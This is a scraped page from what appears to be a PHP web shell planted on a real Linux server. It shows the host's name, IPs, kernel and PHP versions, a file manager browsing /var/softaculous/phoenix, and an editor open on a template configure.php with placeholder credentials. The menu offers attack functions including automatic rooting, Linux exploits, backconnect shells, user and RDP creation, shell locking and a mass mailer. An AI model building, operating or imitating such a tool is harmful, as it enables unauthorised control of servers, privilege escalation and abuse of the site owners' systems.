Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
phoenix /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
?;
php81
[ DIR ]
drwxr-xr-x
?;
php82
[ DIR ]
drwxr-xr-x
_clone.php
3.95
KB
-rw-r--r--
_configure.php
1010
B
-rw-r--r--
configure.php
649
B
-rw-r--r--
edit.php
5.38
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
788
B
-rw-r--r--
import.php
4.31
KB
-rw-r--r--
info.xml
3.24
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
6.27
KB
-rw-r--r--
install.xml
1.25
KB
-rw-r--r--
md5
1014
B
-rw-r--r--
notes.txt
478
B
-rw-r--r--
update_pass.php
4.65
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : configure.php
<?php error_reporting(E_ALL); const HTTP_SERVER = '[[protocol]]://[[domhost]]'; const COOKIE_OPTIONS = [ 'lifetime' => 0, 'domain' => '[[domhost]]', 'path' => '[[relativeurl]]/', 'samesite' => 'Lax', [[secure]] ]; const DIR_WS_CATALOG = '[[relativeurl]]/'; date_default_timezone_set('America/New_York'); // If you are asked to provide configure.php details, // please remove the data below before sharing. const DIR_FS_CATALOG = '[[softpath]]/'; const DB_SERVER = '[[softdbhost]]'; const DB_SERVER_USERNAME = '[[softdbuser]]'; const DB_SERVER_PASSWORD = '[[softdbpass]]'; const DB_DATABASE = '[[softdb]]';
Close